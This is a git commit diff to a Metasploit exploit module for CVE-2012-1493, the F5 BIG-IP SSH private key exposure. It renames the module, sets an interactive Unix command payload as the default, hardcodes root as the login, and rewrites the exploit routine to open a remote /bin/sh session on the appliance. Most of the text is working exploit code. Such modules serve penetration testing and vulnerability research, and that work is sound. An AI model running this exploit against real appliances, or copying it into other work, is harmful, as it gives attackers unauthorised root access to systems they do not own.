Clean up title, options

unstable
James Lee 2012-06-12 12:08:58 -06:00
parent 85e1555e13
commit 539deabef5
1 changed files with 12 additions and 10 deletions

View File

@ -17,7 +17,7 @@ class Metasploit3 < Msf::Exploit::Remote
def initialize
super({
'Name' => 'F5 BIG-IP Known Private Key',
'Name' => 'F5 BIG-IP SSH Private Key Exposure',
'Version' => '$Revision$',
'Description' => %q{
F5 ships a public/private key pair on BIG-IP appliances that allows
@ -41,7 +41,8 @@ class Metasploit3 < Msf::Exploit::Remote
[ 'URL', 'https://www.trustmatta.com/advisories/MATTA-2012-002.txt' ],
[ 'CVE', '2012-1493' ],
],
'DefaultOptions' => { "USERNAME" => "root" },
'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' },
'DefaultTarget' => 0,
})
register_options(
@ -58,8 +59,6 @@ class Metasploit3 < Msf::Exploit::Remote
]
)
deregister_options('PASSWORD','PASS_FILE','BLANK_PASSWORDS','USER_AS_PASS')
end
def rport
@ -102,17 +101,20 @@ class Metasploit3 < Msf::Exploit::Remote
conn = Net::SSH::CommandStream.new(ssh_socket, '/bin/sh', true)
ssh_socket = nil
handler(conn.lsock)
return [:success, nil]
return conn
else
return [:fail, nil]
return false
end
end
def exploit
ret,proof = do_login(ip, datastore["USERNAME"], rport)
print_good "Success: '#{proof.to_s.gsub(/[\r\n\e\b\a]/, ' ')}'"
conn = do_login(ip, "root", rport)
if conn
print_good "Successful login"
handler(conn.lsock)
else
print_error "Login failed"
end
end